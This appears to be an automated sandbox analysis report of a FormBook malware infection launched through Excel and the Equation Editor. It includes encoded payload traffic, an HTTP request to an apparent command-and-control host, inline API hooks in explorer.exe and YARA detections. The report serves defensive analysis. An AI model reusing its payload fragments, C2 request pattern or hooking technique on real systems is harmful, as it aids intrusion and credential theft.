49 66 49 66 49 66 49 66 49 66 4e 4e 62 66 49 66 46 62 66 49 66 6c 6c 66 6c 66 68 49 66 49 66 49 66 4e 49 53 66 46 66 49 66 49 66 53 66 49 66 49 66 49 66 Data Ascii: 7c80<p>qqfcIflbbfIfFfIfIfIfbfIfIfIfNCCfNCCfIfIflhbfIfIfIfIfIfIfIfSbfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIfIflNhfIfIfIflbfFlflhSflbfIflhIfcfNICfFFflhbflfqSfNICfFFfhbflIbflICfllCfFNfllNfllbflllflIFfllbfcqflIcfFNfccfcqfllIfllIflllfllSfFNfchflIlfFNfllbfllqfllIfFNflICfllIfFNfShfqcfhFfFNflIcflllflIIflIlfbSflFflFflIfFSfIfIfIfIfIfIfIfhIfScfIfIfqSflfFfIfqSflbNfblflhIfIfIfIfIfIfIfIfIfNNbfIfFbfIfllflfhIfIfIfNISfFfIfIfSfIfIfIf
Mar 2, 2021 20:23:38.380955935 CET	836	IN	Data Raw: 49 66 49 66 49 66 6c 43 68 66 4e 46 53 66 46 66 49 66 49 66 46 4e 66 49 66 49 66 49 66 49 66 62 66 49 66 49 66 49 66 49 66 6c 4e 68 66 49 66 46 4e 66 49 66 49 66 49 66 4e 66 49 66 49 66 62 66 49 66 49 66 49 66 49 66 49 66 49 66 49 66 62 66 49 66 Data Ascii: IfIfIflChfNFSfFfIfIfFNfIfIfIfIfbfIfIfIfIflNhfIfFNfIfIfIfNfIfIfbfIfIfIfIfIfIfIfbfIfIfIfIfIfIfIfIfSbfbfIfIfNfIfIfIfIfIfIfNfIfSbflFFfIfIflSfIfIflSfIfIfIfIflSfIfIflSfIfIfIfIfIfIflSfIfIfIfIfIfIfIfIfIfIfIfqNfNFSfFfIfhFfIfIfIfIfIfbfIfNlNfFfIfIfIfIfIf
Mar 2, 2021 20:23:38.380995989 CET	838	IN	Data Raw: 49 66 49 66 49 66 4e 62 66 49 66 49 66 49 66 4e 68 66 49 66 49 66 49 66 46 53 66 49 66 49 66 49 66 46 49 66 4e 66 62 49 66 46 4e 66 49 66 49 66 6c 49 66 62 4e 66 46 68 66 49 66 4e 66 62 49 66 46 46 66 49 66 49 66 6c 49 66 49 66 62 4e 66 6c 53 53 Data Ascii: IfIfIfNbfIfIfIfNhfIfIfIfFSfIfIfIfFIfNfbIfFNfIfIflIfbNfFhfIfNfbIfFFfIfIflIfIfbNflSSfllCfFbfIfIflIflNhflfIfIfbfllCfFCfIfIflIflNhfNfIfIfbfllCfFSfIfIflIflNhfFfIfIfbfllCfFqfIfIflIflNhfbfIfIfbfbNfFhfIfFfNCbfNlfqfIfIfNqfbNfFhfIfNfbIfbhfIfIflIfIfbNfhN
Mar 2, 2021 20:23:38.381035089 CET	839	IN	Data Raw: 43 62 66 6c 62 66 6c 66 49 66 6c 6c 62 66 53 71 66 49 66 49 66 6c 6c 4e 66 4e 43 62 66 6c 62 66 4e 66 49 66 6c 6c 43 66 4e 6c 66 49 66 49 66 6c 49 66 4e 43 62 66 6c 62 66 46 66 49 66 4e 43 62 66 6c 4e 66 6c 66 49 66 62 49 66 6c 66 49 66 49 66 62 Data Ascii: CbflbflfIfllbfSqfIfIfllNfNCbflbfNfIfllCfNlfIfIflIfNCbflbfFfIfNCbflNflfIfbIflfIfIfbFflllfNFfIfIflIfNCbflbfbfIfCSfCSfIfIfIfNCbflFfbfIfbIfNbfIfIflIfNCbflbfCfIfNCbflNfCfIfbIfNCfIfIflIfNCbflNfNfIfbIfNSfIfIflIfNlhfNCbflbfSfIfNCbflNfFfIfNCbflNfSfIfbI
Mar 2, 2021 20:23:38.381072998 CET	840	IN	Data Raw: 53 66 49 66 62 49 66 4e 71 66 49 66 49 66 6c 49 66 6c 6c 6c 66 4e 68 66 49 66 49 66 6c 49 66 46 68 66 49 66 4e 43 62 66 6c 46 66 62 66 49 66 62 49 66 4e 63 66 49 66 49 66 6c 49 66 4e 43 62 66 6c 62 66 71 66 49 66 4e 43 62 66 6c 4e 66 71 66 49 66 Data Ascii: SfIfbIfNqfIfIflIflllfNhfIfIflIfFhfIfNCbflFfbfIfbIfNcfIfIflIfNCbflbfqfIfNCbflNfqfIfChflqhfNCCfNCCfNCCfNNlflqfIfIfIfNCbflFfbfIfNCbfNNfNfIfIfNqflllfFIfIfIflIfIfNNIfNCbflNfFfIflllfFlfIfIflIfNCbflbfIfIfCSfIfIfIfIfNCbflNfIfIfbNfIfIflflSfIfIfNfIfNhfI
Mar 2, 2021 20:23:38.381112099 CET	842	IN	Data Raw: 49 66 4e 68 66 49 66 6c 49 53 66 6c 46 62 66 49 66 6c 71 66 49 66 49 66 49 66 49 66 4e 71 66 62 68 66 4e 66 49 66 6c 71 62 66 49 66 49 66 49 66 6c 66 49 66 49 66 6c 71 66 49 66 6c 6c 62 66 4e 6c 66 6c 66 49 66 6c 6c 4e 66 4e 43 62 66 6c 62 66 6c Data Ascii: IfNhfIflISflFbfIflqfIfIfIfIfNqfbhfNfIflqbfIfIfIflfIfIflqfIfllbfNlflfIfllNfNCbflbflfIfllbfCcflfIfllNfNCbflbfNfIfllCfNlfIfIflIfNCbflbfFfIfNCbflNflfIfbIflfIfIfbFflllfNFfIfIflIfNCbflbfbfIfCSfCSfIfIfIfNCbflFfbfIfbIfNbfIfIflIfNCbflbfCfIfNCbflNfCfIfb
Mar 2, 2021 20:23:38.381150007 CET	843	IN	Data Raw: 66 43 66 49 66 62 49 66 4e 43 66 49 66 49 66 6c 49 66 4e 43 62 66 6c 4e 66 4e 66 49 66 62 49 66 4e 53 66 49 66 49 66 6c 49 66 4e 6c 68 66 4e 43 62 66 6c 62 66 53 66 49 66 4e 43 62 66 6c 4e 66 46 66 49 66 4e 43 62 66 6c 4e 66 53 66 49 66 62 49 66 Data Ascii: fCfIfbIfNCfIfIflIfNCbflNfNfIfbIfNSfIfIflIfNlhfNCbflbfSfIfNCbflNfFfIfNCbflNfSfIfbIfNqfIfIflIflllfNhfIfIflIfFhfIfNCbflFfbfIfbIfNcfIfIflIfNCbflbfqfIfNCbflNfqfIfChflqhfNCCfNCCfNCCfNNlflqfIfIfIfNCbflFfbfIfNCbfNNfNfIfIfNqflllfFIfIfIflIfIfNNIfNCbflNf
Mar 2, 2021 20:23:38.381197929 CET	845	IN	Data Raw: 4e 43 62 66 6c 4e 66 46 66 49 66 6c 6c 6c 66 46 6c 66 49 66 49 66 6c 49 66 4e 43 62 66 6c 62 66 49 66 49 66 43 53 66 49 66 49 66 49 66 49 66 4e 43 62 66 6c 4e 66 49 66 49 66 62 4e 66 49 66 49 66 6c 66 6c 53 66 49 66 49 66 4e 66 49 66 4e 68 66 49 Data Ascii: NCbflNfFfIflllfFlfIfIflIfNCbflbfIfIfCSfIfIfIfIfNCbflNfIfIfbNfIfIflflSfIfIfNfIfNhfIflISflFbfIflqfIfIfIfIfNqfbhfNfIflqbfIfIfIflfIfIflqfIfllbfCfNfIfllNfNCbflbflfIfllbfNlfNfIfllNfNCbflbfNfIfllCfNlfIfIflIfNCbflbfFfIfNCbflNflfIfbIflfIfIfbFflllfNFfIf
Mar 2, 2021 20:23:38.381239891 CET	846	IN	Data Raw: 46 66 49 66 49 66 6c 49 66 4e 43 62 66 6c 62 66 62 66 49 66 43 53 66 43 53 66 49 66 49 66 49 66 4e 43 62 66 6c 46 66 62 66 49 66 62 49 66 4e 62 66 49 66 49 66 6c 49 66 4e 43 62 66 6c 62 66 43 66 49 66 4e 43 62 66 6c 4e 66 43 66 49 66 62 49 66 4e Data Ascii: FfIfIflIfNCbflbfbfIfCSfCSfIfIfIfNCbflFfbfIfbIfNbfIfIflIfNCbflbfCfIfNCbflNfCfIfbIfNCfIfIflIfNCbflNfNfIfbIfNSfIfIflIfNlhfNCbflbfSfIfNCbflNfFfIfNCbflNfSfIfbIfNqfIfIflIflllfNhfIfIflIfFhfIfNCbflFfbfIfbIfNcfIfIflIfNCbflbfqfIfNCbflNfqfIfChflqhfNCCfNC
Mar 2, 2021 20:23:38.381278038 CET	847	IN	Data Raw: 66 4e 43 43 66 4e 43 43 66 4e 43 43 66 4e 4e 6c 66 6c 71 66 49 66 49 66 49 66 4e 43 62 66 6c 46 66 62 66 49 66 4e 43 62 66 4e 4e 66 4e 66 49 66 49 66 4e 71 66 6c 6c 6c 66 46 49 66 49 66 49 66 6c 49 66 49 66 4e 4e 49 66 4e 43 62 66 6c 4e 66 46 66 Data Ascii: fNCCfNCCfNCCfNNlflqfIfIfIfNCbflFfbfIfNCbfNNfNfIfIfNqflllfFIfIfIflIfIfNNIfNCbflNfFfIflllfFlfIfIflIfNCbflbfIfIfCSfIfIfIfIfNCbflNfIfIfbNfIfIflflSfIfIfNfIfNhfIflISflFbfIflqfIfIfIfIfNqfbhfNfIflqbfIfIfIflfIfIflqfIfllbfNIFfNfIfllNfNCbflbflfIfllbfNFCf
Mar 2, 2021 20:23:38.383268118 CET	849	IN	Data Raw: 66 53 71 66 46 66 49 66 6c 6c 4e 66 4e 43 62 66 6c 62 66 4e 66 49 66 6c 6c 43 66 4e 6c 66 49 66 49 66 6c 49 66 4e 43 62 66 6c 62 66 46 66 49 66 4e 43 62 66 6c 4e 66 6c 66 49 66 62 49 66 6c 66 49 66 49 66 62 46 66 6c 6c 6c 66 4e 46 66 49 66 49 66 Data Ascii: fSqfFfIfllNfNCbflbfNfIfllCfNlfIfIflIfNCbflbfFfIfNCbflNflfIfbIflfIfIfbFflllfNFfIfIflIfNCbflbfbfIfCSfCSfIfIfIfNCbflFfbfIfbIfNbfIfIflIfNCbflbfCfIfNCbflNfCfIfbIfNCfIfIflIfNCbflNfNfIfbIfNSfIfIflIfNlhfNCbflbfSfIfNCbflNfFfIfNCbflNfSfIfbIfNqfIfIflIfll

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.22	49177	99.86.159.34	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2021 20:23:39.141524076 CET	1728	OUT	GET / HTTP/1.1 User-Agent: Other Host: www.liverpoolfc.com Connection: Keep-Alive
Mar 2, 2021 20:23:39.188811064 CET	1729	IN	HTTP/1.1 301 Moved Permanently Server: CloudFront Date: Tue, 02 Mar 2021 19:23:39 GMT Content-Type: text/html Content-Length: 183 Connection: keep-alive Location: https://www.liverpoolfc.com/ X-Cache: Redirect from cloudfront Via: 1.1 783a2e1eae90b7e367c282f984f64e36.cloudfront.net (CloudFront) X-Amz-Cf-Pop: MXP64-C2 X-Amz-Cf-Id: KqJJLCjKcpggriyW8EgwBV3TK8hb4PQRPGYEORNydghnd1qX3nI1Qg== Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.22	49181	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2021 20:25:03.425981998 CET	1980	OUT	GET /z65/?khm06=LNri0hTDA3J+egDGUUWsiV5v8a8SlWFxc+6+F6yDAxnyfd9Lz/4xhtJBrlTkPubTKsq9BA==&AX=mTXhwhcHBBUhiJp HTTP/1.1 Host: www.ofetons.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2021 20:25:03.644177914 CET	1982	IN	HTTP/1.1 403 Forbidden Date: Tue, 02 Mar 2021 19:25:03 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: -1 X-Dc: gcp-us-central1 X-Request-ID: 2d5939cd-ad58-4e13-838b-0ab98ace5185 Set-Cookie: _shopify_fs=2021-03-02T19%3A25%3A03Z; Expires=Wed, 02-Mar-22 19:25:03 GMT; Domain=ofetons.com; Path=/; SameSite=Lax X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC cf-request-id: 0895ffbc5f00004e4a5c138000000001 Server: cloudflare CF-RAY: 629d02409ad74e4a-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0
Mar 2, 2021 20:25:03.644206047 CET	1983	IN	Data Raw: 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c Data Ascii: 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;paddi
Mar 2, 2021 20:25:03.644227982 CET	1984	IN	Data Raw: 7d 2c 0a 20 20 22 70 74 2d 42 52 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 65 73 73 6f 20 6e 65 67 61 64 6f 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 56 6f 63 c3 aa 20 6e c3 a3 6f 20 74 65 6d Data Ascii: }, "pt-BR": { "title": "Acesso negado", "content-title": "Voc no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" },
Mar 2, 2021 20:25:03.644249916 CET	1986	IN	Data Raw: 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 77 65 62 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 68 69 Data Ascii: "content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
Mar 2, 2021 20:25:03.644265890 CET	1986	IN	Data Raw: 2f 20 49 45 20 3c 3d 20 31 30 0a 20 20 20 20 22 65 6e 22 3b 0a 20 20 6c 61 6e 67 75 61 67 65 20 3d 20 6c 61 6e 67 75 61 67 65 2e 73 70 6c 69 74 28 22 2d 22 29 5b 30 5d 3b 20 2f 2f 20 53 74 72 69 70 20 63 6f 75 6e 74 72 79 20 63 6f 64 65 0a 20 20 Data Ascii: / IE <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] \|\| t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "
Mar 2, 2021 20:25:03.644283056 CET	1986	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Mar 2, 2021 20:23:27.572011948 CET	97.107.138.110	443	192.168.2.22	49167	CN=carnesymas-restaurante.renova-sa.net CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon Feb 08 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Mon May 10 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Mar 2, 2021 20:23:39.437550068 CET	99.86.159.103	443	192.168.2.22	49178	CN=*.liverpoolfc.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Fri Feb 12 01:00:00 CET 2021 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009	Mon Mar 14 00:59:59 CET 2022 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN=Amazon, OU=Server CA 1B, O=Amazon, C=US	CN=Amazon Root CA 1, O=Amazon, C=US	Thu Oct 22 02:00:00 CEST 2015	Sun Oct 19 02:00:00 CEST 2025
					CN=Amazon Root CA 1, O=Amazon, C=US	CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	Mon May 25 14:00:00 CEST 2015	Thu Dec 31 02:00:00 CET 2037
					CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 02 02:00:00 CEST 2009	Wed Jun 28 19:39:16 CEST 2034

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xEE
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xEE
GetMessageW	INLINE	0x48 0x8B 0xB8 0x89 0x9E 0xEE
GetMessageA	INLINE	0x48 0x8B 0xB8 0x81 0x1E 0xEE

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1844 Parent PID: 584

General

Start time:	20:22:51
Start date:	02/03/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f7e0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2504 Parent PID: 584

General

Start time:	20:23:12
Start date:	02/03/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2688 Parent PID: 2504

General

Start time:	20:23:16
Start date:	02/03/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x150000
File size:	17672 bytes
MD5 hash:	5E56329C37A437E87B485914FD524AA9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2377749186.0000000003121000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2380975508.0000000003858000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: cmd.exe PID: 2864 Parent PID: 2688

General

Start time:	20:23:31
Start date:	02/03/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:	0x4a920000
File size:	302592 bytes
MD5 hash:	AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: timeout.exe PID: 3032 Parent PID: 2864

General

Start time:	20:23:31
Start date:	02/03/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 1
Imagebase:	0x860000
File size:	27136 bytes
MD5 hash:	419A5EF8D76693048E4D6F79A5C875AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: vbc.exe PID: 3052 Parent PID: 2688

General

Start time:	20:23:34
Start date:	02/03/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x150000
File size:	17672 bytes
MD5 hash:	5E56329C37A437E87B485914FD524AA9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2968 Parent PID: 2688

General

Start time:	20:23:34
Start date:	02/03/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x150000
File size:	17672 bytes
MD5 hash:	5E56329C37A437E87B485914FD524AA9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2964 Parent PID: 2688

General

Start time:	20:23:34
Start date:	02/03/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\vbc.exe
Imagebase:	0x150000
File size:	17672 bytes
MD5 hash:	5E56329C37A437E87B485914FD524AA9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2236122325.0000000000190000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2236172142.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2236055627.00000000000E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 